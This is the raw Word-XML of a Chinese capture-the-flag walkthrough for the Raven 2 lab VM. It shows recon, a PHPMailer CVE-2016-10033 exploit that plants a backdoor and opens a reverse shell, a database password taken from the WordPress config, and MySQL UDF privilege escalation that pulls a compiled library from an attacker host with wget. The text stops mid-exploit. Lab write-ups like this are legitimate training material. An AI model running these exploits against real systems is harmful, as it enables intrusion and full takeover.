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F14EA3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Raven 2是一个中等难度的boot2root 虚拟靶机，在多次被攻破后，Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57627F3B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总共4个flag需要找出!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7E73A" w14:textId="7BCFB2DF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先将靶机导入并开机.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E216D" w14:textId="2536EEA6" w:rsidR="004C7F3B" w:rsidRPr="007B74E6" w:rsidRDefault="004C7F3B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76E2966" wp14:editId="013CC8B3">
            <wp:extent cx="5274310" cy="25717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9262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3CFE03CA" wp14:editId="77E43206">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="33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808DB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CVbIB/oAQAAxQ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</w:p>
    <w:p w14:paraId="0FB28C40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利用netdiscover对eh0网卡进行探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE190D2" w14:textId="77777777" w:rsidR="004C7F3B" w:rsidRDefault="007B74E6" w:rsidP="004C7F3B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netdiscover -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC0817" w14:textId="161A3FB3" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="004C7F3B" w:rsidP="004C7F3B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884ED0A" wp14:editId="080A7499">
            <wp:extent cx="5274310" cy="15506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5158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这里可以通过经验判断192.168.61.135就是靶机的IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC06188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nmap -A 192.168.61.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A5999" w14:textId="07E99C9C" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="004C7F3B" w:rsidP="004C7F3B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29D0A2" wp14:editId="3672D894">
            <wp:extent cx="4478376" cy="2492734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7818" cy="25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6"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1C4E071A" wp14:editId="78733959">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="31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1B4A7" id="AutoShap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Qjt/t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49FC2F74" w14:textId="15368F2C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通过nmap的信息可以看出这个就是靶机的IP地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB54C0E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通过上面的信息我们可以看到，靶机开放了22，80，111这3个端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833A9E6" w14:textId="6EEB84C6" w:rsidR="007B74E6" w:rsidRDefault="007B74E6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我们先看80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51860E" w14:textId="1F96A5A2" w:rsidR="004C7F3B" w:rsidRPr="007B74E6" w:rsidRDefault="004C7F3B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15D0D1E" wp14:editId="20010F96">
            <wp:extent cx="5274310" cy="1802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A698" w14:textId="7CD61FBA" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="003102FB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看到是一个网站，所以我们就先进行目录的爆破，这里我用gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FF73B" w14:textId="4E7E42DC" w:rsidR="007B74E6" w:rsidRDefault="007B74E6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gobuster -u http://192.168.61.135 -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7C89D" w14:textId="18155D6A" w:rsidR="00844391" w:rsidRPr="007B74E6" w:rsidRDefault="00C01762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6AD6522" wp14:editId="2A16CB89">
            <wp:extent cx="4533635" cy="3279913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991" cy="32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4D1" w14:textId="462540CE" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00844391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这里先看下vendor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A77829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这个网站是存在目录遍历的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B97564" w14:textId="2D5778EC" w:rsidR="007B74E6" w:rsidRDefault="007B74E6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我打开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http://192.168.61.135/vendor/PATH</w:t>
      </w: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发现了第一个FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6BF51" w14:textId="3383FD28" w:rsidR="00C01762" w:rsidRPr="00C01762" w:rsidRDefault="00C01762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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6993A4BF" wp14:editId="60241C96">
            <wp:extent cx="2500331" cy="30480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0331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75E" w14:textId="77777777" w:rsidR="00C01762" w:rsidRPr="007B74E6" w:rsidRDefault="00C01762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</w:p>
    <w:p w14:paraId="79D95584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</w:p>
    <w:p w14:paraId="21B2A124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1542AFC6" wp14:editId="3A5E0669">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="28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195AB3" id="AutoShap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Nt8WM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5CDCA30A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除了FLAG还有网站的目录地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767A2FB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/var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE443AF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把每个文件翻下，大概知道了服务器上安装这PHPMailer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39057BDF" w14:textId="59E8FFD0" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="00202221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6CDA340" wp14:editId="146C4C8B">
            <wp:extent cx="5274310" cy="1355697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9237" cy="13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F80D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7BB3DDC4" wp14:editId="3E4FAD34">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="26" name="AutoShap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2EE3B6" id="AutoShap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FlKk9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6FD1BC9F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我们通过kali的searchsploit来查找PHPMailer的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E1EEA" w14:textId="5431AB9F" w:rsidR="007B74E6" w:rsidRDefault="007B74E6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searchsploit phpmailer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091C6FC" w14:textId="556770E6" w:rsidR="00DD5DAF" w:rsidRPr="007B74E6" w:rsidRDefault="00DD5DAF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C6314B9" wp14:editId="07F130BF">
            <wp:extent cx="5274310" cy="16154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1635" w14:textId="40717CFB" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00056ED9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但是我们不知道靶机上的PHPMailer的版本是多少，但是VERSION提供的PHPMailer的版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD47A08" w14:textId="5574B821" w:rsidR="00056ED9" w:rsidRPr="007B74E6" w:rsidRDefault="00056ED9" w:rsidP="00056ED9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9C89A75" wp14:editId="1FDA7DDB">
            <wp:extent cx="2119328" cy="44291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9328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5163" w14:textId="05E1382F" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00056ED9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这里我们选用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3508B1" w14:textId="33A7FA50" w:rsidR="002A41B2" w:rsidRPr="007B74E6" w:rsidRDefault="002A41B2" w:rsidP="00056ED9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E3A9558" wp14:editId="6F30A481">
            <wp:extent cx="5269123" cy="33395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4895" cy="3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59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0BA8CEAC" wp14:editId="660D4731">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="23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DFC63" id="AutoShap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TV59E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2473981D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你可以通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F50E7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searchsploit -x exploits/php/webapps/40974.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF6284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查看到EXP的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A34F6D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也可以用exploit-db.com进行搜索exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352AD600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Verdana" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="075DB3"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        </w:rPr>
        <w:t>https://www.exploit-db.com/exploits/40974</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476089D4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通过exploit-db的查询我们知道这个漏洞的编号为CVE-2016-10033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D945CF6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然后我们查下漏洞资料：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https://www.anquanke.com/post/id/85295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF2621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这个漏洞是因为邮件地址能够包含用引号括起来的空格，这样可以进行攻击参数的注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032694E3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我们我们在网站主页上看到的邮件页面地址为：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http://192.168.61.135//contact.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A7438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接下来我们把EXP的内容进行下载编辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B98B8C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修改内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2B465C" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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1. 开头加上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3722B9" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173BCAE2" w14:textId="6EF30EDA" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DB302" w14:textId="379F8AEC" w:rsidR="00580500" w:rsidRPr="007B74E6" w:rsidRDefault="00580500" w:rsidP="007B74E6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EA160C3" wp14:editId="09D62C11">
            <wp:extent cx="5274310" cy="30175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F200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2671112C" wp14:editId="5AAC8DD0">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="22" name="AutoShap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C96EB" id="AutoShape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PdpArXoAQAAxg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</w:p>
    <w:p w14:paraId="7C6AE926" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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2. 修改target地址为靶机的CONTACT页面地址：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http://192.168.61.135/contact.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F6073" w14:textId="78654D42" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360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修改backdoor为’/sdfz.php’,默认的backdoor.php执行时无法生成（原因可能是如介绍说这个靶机多次被攻击增加了安全性，这类敏感字肯定会被ban）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151C8F2" w14:textId="59676A57" w:rsidR="00580500" w:rsidRDefault="00580500" w:rsidP="00CA3DCF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66FE193" wp14:editId="41AEF584">
            <wp:extent cx="3446890" cy="223520"/>
            <wp:effectExtent l="0" t="0" r="127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0049" cy="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7621" w14:textId="0E7B1934" w:rsidR="00CA3DCF" w:rsidRPr="007B74E6" w:rsidRDefault="00580500" w:rsidP="00CA3DCF">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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89282E6" wp14:editId="4A704867">
            <wp:extent cx="1669774" cy="223489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2355" cy="2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558B" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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3. 修改payload的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F6215" w14:textId="4E4E406C" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="00CA3DCF" w:rsidP="00CA3DCF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C1D668F" wp14:editId="1F2C33FB">
            <wp:extent cx="4465320" cy="11251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495" cy="113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B26" w14:textId="77777777" w:rsidR="006A4453" w:rsidRDefault="006A4453" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360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5228F9F5" w14:textId="77777777" w:rsidR="006A4453" w:rsidRDefault="006A4453" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360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61B713D1" w14:textId="67CEC402" w:rsidR="006A4453" w:rsidRDefault="007B74E6" w:rsidP="006A4453">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia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4. 运行后出现如下错误，只要pip install requests-toolbelt即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48907F4E" w14:textId="3B348810" w:rsidR="006A4453" w:rsidRPr="007B74E6" w:rsidRDefault="006A4453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954AB3F" wp14:editId="5C70A09E">
            <wp:extent cx="5274310" cy="11557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BF6F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678A9E95" wp14:editId="4BF297CA">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="19" name="AutoShap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30C24" id="AutoShape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DTaHq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239AFDD0" w14:textId="7FCA68FE" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360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5. 然后KALI nc监听下对应的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AE4B1" w14:textId="3AAABECC" w:rsidR="009C34B7" w:rsidRPr="007B74E6" w:rsidRDefault="009C34B7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36673BF" wp14:editId="4C7345D8">
            <wp:extent cx="3090885" cy="7429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CB0A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34B5FC2C" wp14:editId="4497EB04">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="18" name="AutoShap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7A41E" id="AutoShape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nczwb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2204F422" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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6. 然后我们访问下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http://192.168.61.135/contact.php</w:t>
      </w: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，这样就会执行我们的payload在目录下面生成sdfz.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33168A5A" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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7. 然后我们在访问下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http://192.168.61.135/sdfz.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C67BE9" w14:textId="5E9A9CD5" w:rsidR="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left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8. 这个时候我们就会得到反弹的shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F794F" w14:textId="5BF0EE06" w:rsidR="00C36EA1" w:rsidRPr="007B74E6" w:rsidRDefault="00C36EA1" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left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4E83A5D" wp14:editId="1C13E7FD">
            <wp:extent cx="4533933" cy="1728800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33" cy="1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4BA0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131FD9CA" wp14:editId="47F2CBFC">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="17" name="AutoShap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198F7" id="AutoShape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JVEez/oAQAAxg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</w:p>
    <w:p w14:paraId="083DF287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我们用python来获取个pty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8DCE67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python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26E70F" w14:textId="7AB5545A" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00351392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然后我们搜索下关键字flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B12D4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find / -name "flag*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27CBC4" w14:textId="465717B2" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00351392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发现2个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FF95D" w14:textId="4423380B" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6" w:rsidP="00351392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那么现在就剩最后一个FLAG了，应该就在root目录里面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E3170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所以接下来就是提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B688E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我第一反应是用脏牛进行提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26270BBE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从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https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA511D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下载dirty.c在kali中进行编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18069E41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gcc -pthread dirty.c -o dirty -lcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1D97C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然后kali用python 的SimpleHTTPServer模块开启个HTTP服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69315AE3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然后在靶机中用wget下载编译好的脏牛文件进行运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2578A570" w14:textId="1629C52E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但是不管我怎么更名并下载脏牛，这个wget都卡在这</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E3E9D" w14:textId="4CCDD11E" w:rsidR="00351392" w:rsidRPr="007B74E6" w:rsidRDefault="00351392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EDC47B0" wp14:editId="33B6F1F8">
            <wp:extent cx="4472020" cy="771531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2020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D8A" w14:textId="3D4E21FA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32E48137" wp14:editId="033DDCEC">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="12" name="AutoShap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3ABC9" id="AutoShape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F74TKXoAQAAxg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</w:p>
    <w:p w14:paraId="6DCA1548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脏牛就用不上了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F564D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我们上传个LinEnum.sh对LINUX进行信息收集，方便提权使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BEBE97" w14:textId="607D597C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0563C1"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single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项目地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00351392" w:rsidRPr="00C81DED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
            <w:spacing w:val="8"/>
            <w:kern w:val="0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://github.com/rebootuser/LinEnum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="637D6590" w14:textId="7068E2F5" w:rsidR="00351392" w:rsidRPr="00351392" w:rsidRDefault="00351392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2D7B1F7" wp14:editId="27D30602">
            <wp:extent cx="4452970" cy="1400185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2970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48A6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7750F736" wp14:editId="7828DCA2">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="11" name="AutoShap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7C1866" id="AutoShape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pZkwF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5BC9DF12" w14:textId="659A33D3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然后加权运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F9C6A" w14:textId="635DD5E0" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="00351392" w:rsidP="00351392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211693B" wp14:editId="082DD8B9">
            <wp:extent cx="5274310" cy="2101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7768" w14:textId="21E2EA6A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然后在运行结果中看到这条，mysql使用root运行的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19479789" w14:textId="6851B0A0" w:rsidR="00351392" w:rsidRPr="007B74E6" w:rsidRDefault="00351392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0F1DBA5" wp14:editId="08D81B71">
            <wp:extent cx="5274310" cy="66790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3527" cy="6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B602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0B8ABA76" wp14:editId="642007D3">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9" name="AutoShap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6AD10" id="AutoShap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e+Maf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098053C8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漏洞信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1AC63F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https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D342744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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D34761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如果MySQL版本 &lt;= 5.7.14，5.6.32，5.5.51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38660877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则有MySQL-Exploit-Remote-Root-Code-Execution-Privesc漏洞可以进行提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F87DC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我们回到网站根目录ls，可以看到有wordpress(wp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630311A" w14:textId="77777777" w:rsidR="001353C0" w:rsidRDefault="001353C0" w:rsidP="001353C0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37027C34" w14:textId="6F2C0106" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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我们进去查看下wp的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563A5CA" w14:textId="08590F9D" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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1FBB360A" wp14:editId="6C14EE7A">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7" name="AutoShap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2150D" id="AutoShape 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I8RxK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="001353C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB8C197" wp14:editId="59E7A99A">
            <wp:extent cx="4481545" cy="354332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35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1A7E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数据库账号：root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F0FAA9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数据库密码：R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD09A7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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8007E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那么我们登录下mysql查看下mysql版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037BDCA" w14:textId="15471080" w:rsidR="007B74E6" w:rsidRPr="007B74E6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621C6380" wp14:editId="6250B07A">
            <wp:extent cx="4457733" cy="352903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A3F5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这里我们看到Mysql的版本是存在漏洞的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036C2F9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我们从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https://www.exploit-db.com/exploits/1518</w:t>
      </w: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获取EXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2A38D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lastRenderedPageBreak/>
        <w:t>然后我们在KALI上编译生成so文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="501"/>
        <w:tblW w:w="633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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B74E6" w:rsidRPr="007B74E6" w14:paraId="7B1F521F" w14:textId="77777777" w:rsidTr="001353C0">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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4A90A94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wget https://www.exploit-db.com/download/1518</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640785A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mv 1518 raptor_udf.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F9EAF0F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gcc -g -c raptor_udf.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55AE9B0E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gcc -g -shared -o  raptor_udf.so raptor_udf.o -lc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267F424D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mv raptor_udf.so sdfz_udf.so</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B9E5A68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6CE7C072" wp14:editId="11CEC6EF">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5" name="AutoShap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80419" id="AutoShape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1PPqh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4F0970D9" w14:textId="659226B3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</w:p>
    <w:p w14:paraId="5C3DE4B3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15EED79E" w14:textId="60398076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190205F0" w14:textId="4C2ABFBC" w:rsidR="001353C0" w:rsidRDefault="001353C0" w:rsidP="007B74E6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F0A7F78" wp14:editId="5D3ECD1A">
            <wp:extent cx="5274310" cy="2641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C40" w14:textId="77777777" w:rsidR="001353C0" w:rsidRPr="007B74E6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然后同样在靶机上用wget下载sdfz_udf.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54430DE8" w14:textId="6C3AAD76" w:rsidR="001353C0" w:rsidRDefault="001353C0" w:rsidP="001353C0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cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B0B9A" w14:textId="06D27E4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wget </w:t>
      </w:r>
      <w:r w:rsidRPr="007B74E6">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="0563C1"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://192.168.61.130:8000/sdfz_udf.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38D375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44B2797E" wp14:editId="0DEBB93C">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4" name="AutoShap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BC916" id="AutoShape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JRDCOPoAQAAxQ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</w:p>
    <w:p w14:paraId="3B151867" w14:textId="77777777" w:rsidR="007B74E6" w:rsidRPr="007B74E6" w:rsidRDefault="007B74E6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然后我们进入数据库开始提权</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="332"/>
        <w:tblW w:w="690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02"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B74E6" w:rsidRPr="007B74E6" w14:paraId="64EA8415" w14:textId="77777777" w:rsidTr="001353C0">
        <w:trPr>
          <w:trHeight w:val="1485"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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3560CA6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lastRenderedPageBreak/>
              <w:t>mysql&gt; use mysql;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072FFEFF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use mysql;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5756231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Reading table information for completion of table and column names</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8C70B6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You can turn off this feature to get a quicker startup with -A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCCC3AC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267B50E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Database changed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DADF2B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create table foo(line blob);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB05221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create table foo(line blob);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4BB034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Query OK, 0 rows affected (0.06 sec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB38A2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41C84DD7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insert into foo values(load_file('/tmp/sdfz_udf.so'));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5F101D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insert into foo values(load_file('/tmp/sdfz_udf.so'));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FA0EA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Query OK, 1 row affected (0.00 sec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05115957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059D2052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select * from foo into dumpfile '/usr/lib/mysql/plugin/sdfz_udf.so';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77EDA8B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【其中dumpfile的路径要根据前面进程列出来的plugin目录进行改动】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736ED796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select * from foo into dumpfile '/usr/lib/mysql/plugin/sdfz_udf.so';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E51849B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Query OK, 1 row affected (0.04 sec)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18593CE6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32821082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create function do_system returns integer soname 'sdfz_udf.so';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C0139C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create function do_system returns integer soname 'sdfz_udf.so';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DBD0CFB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Query OK, 0 rows affected (0.00 sec)</w:t>
            </w:r>
          </w:p>
